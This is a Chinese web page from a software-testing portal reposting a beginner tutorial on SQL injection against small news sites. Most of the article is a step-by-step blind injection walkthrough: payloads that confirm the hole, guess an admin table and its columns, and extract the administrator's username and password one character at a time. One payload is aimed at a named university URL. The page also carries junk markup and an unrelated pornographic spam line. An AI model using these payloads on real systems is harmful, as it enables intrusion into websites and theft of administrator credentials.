• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
    • 軟件測試技術
    • 軟件測試博客
    • 軟件測試視頻
    • 開源軟件測試技術
    • 軟件測試論壇
    • 軟件測試沙龍
    • 軟件測試資料下載
    • 軟件測試雜志
    • 軟件測試人才招聘
      暫時沒有公告

    字號: | 推薦給好友 上一篇 | 下一篇

    菜鳥入門級:SQL注入攻擊

    發布: 2008-8-04 10:27 | 作者: 網絡轉載 | 來源: 測試時代采編 | 查看: 86次 | 進入軟件測試論壇討論

    領測軟件測試網

    文章來源:網頁吧


        一般國內的小一點的新聞站點程序 都有 ""&request 這種漏洞,下面我講解攻擊方法

      在地址欄:

      and 1=1

      查看漏洞是否存在,如果存在就正常返回該頁,如果沒有,則顯示錯誤,繼續假設這個站的數據庫存在一個admin表

      在地址欄:

      and 0<>(select count(*) from admin)

      返回頁正常,假設成立了。

      下面來猜猜看一下管理員表里面有幾個管理員ID:

      and 1<(select count(*) from admin)

      頁面什么都沒有。管理員的數量等于或者小于1個

      and 1=(select count(*) from admin)

      輸入=1沒顯示錯誤,說明此站點只有一個管理員。

      下面就是要繼續猜測admin 里面關于管理員用戶名和密碼的字段名稱。

    and 1=(select count(*) from admin where len(username)>0)

      猜解錯誤!不存在 username 這個字段。只要一直改變括號里面的username這個字段,下面給大家幾個常用的

    user,users,member,members,userlist,memberlist,userinfo,admin,manager,用戶,yonghu

    用戶名稱字段猜解完成之后繼續猜解密碼字段

      and 1=(select count(*) from admin where len(password)>0)

      password 字段存在!因為密碼字段一般都是這個拉,如果不是就試試pass如果還不是就自己想想吧

      我們已經知道了管理員表里面有3個字段 id,user,password。

      id 編號

      user 用戶名

      password 密碼

      下面繼續的就是管理員用戶名和密碼的猜解了。一個一個來,有點麻煩,最好找個猜解機來

      先猜出長度!

      and 1=(select count(*) from admin where len(user)<10)

      user 字段長度小于10

      and 1=(select count(*) from admin where len(user)<5)

      user 字段長度不小于5

     慢慢的來,最后猜出長度等于6,請看下面,返回正常就說明猜解正確

      and 1=(select count(*) from admin where len(user)=6)

      下面猜密碼,

     and 1=(select count(*) from admin where len(password)=10)

      猜出來密碼10位,不要奇怪,現在網管都有防備的,所以密碼上20位也不太奇怪了

    下面該做的就是把他們拆開來一個一個猜字母

      and 1=(select count(*) from admin where left(user,1)=a)


      返回正常,第一位字母等于a,千萬不要把大寫和小寫給搞錯了哦~~呵呵,如果不a就繼續猜其他的字符落,反正猜到返回正常就算OK了

      開始猜解帳號的第二位字符。

      and 1=(select count(*) from admin where left(user,2)=ad)


      就這樣一次加一個字符這樣猜,猜到夠你剛才猜出來的多少位了就對了,帳號就算出來了

      工作還沒有完,別忙著跑了,還有10位密碼,呵呵

      and 1=(select count(*) from admin where left(password,1)=a)

      經過無數次錯誤之后......

      http://xyz.hytc.edu.cn/new2/article_view.asp?id=2499 and 1=(select count(*) from admin where left(password,10)=administra)


      結果密碼是administra


      看完文章,大家不要照著我的文章做,網絡上的東西是變幻無窮的,但是我相信大家的大腦肯定比他變得快,所以希望大家看了這個文章靈活運用!那樣才能達到理想的效果。

    延伸閱讀

    文章來源于領測軟件測試網 http://www.kjueaiud.com/

    TAG: sql SQL Sql 攻擊 入門 菜鳥


    關于領測軟件測試網 | 領測軟件測試網合作伙伴 | 廣告服務 | 投稿指南 | 聯系我們 | 網站地圖 | 友情鏈接
    版權所有(C) 2003-2010 TestAge(領測軟件測試網)|領測國際科技(北京)有限公司|軟件測試工程師培訓網 All Rights Reserved
    北京市海淀區中關村南大街9號北京理工科技大廈1402室 京ICP備10010545號-5
    技術支持和業務聯系:info@testage.com.cn 電話:010-51297073

    軟件測試 | 領測國際ISTQBISTQB官網TMMiTMMi認證國際軟件測試工程師認證領測軟件測試網

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>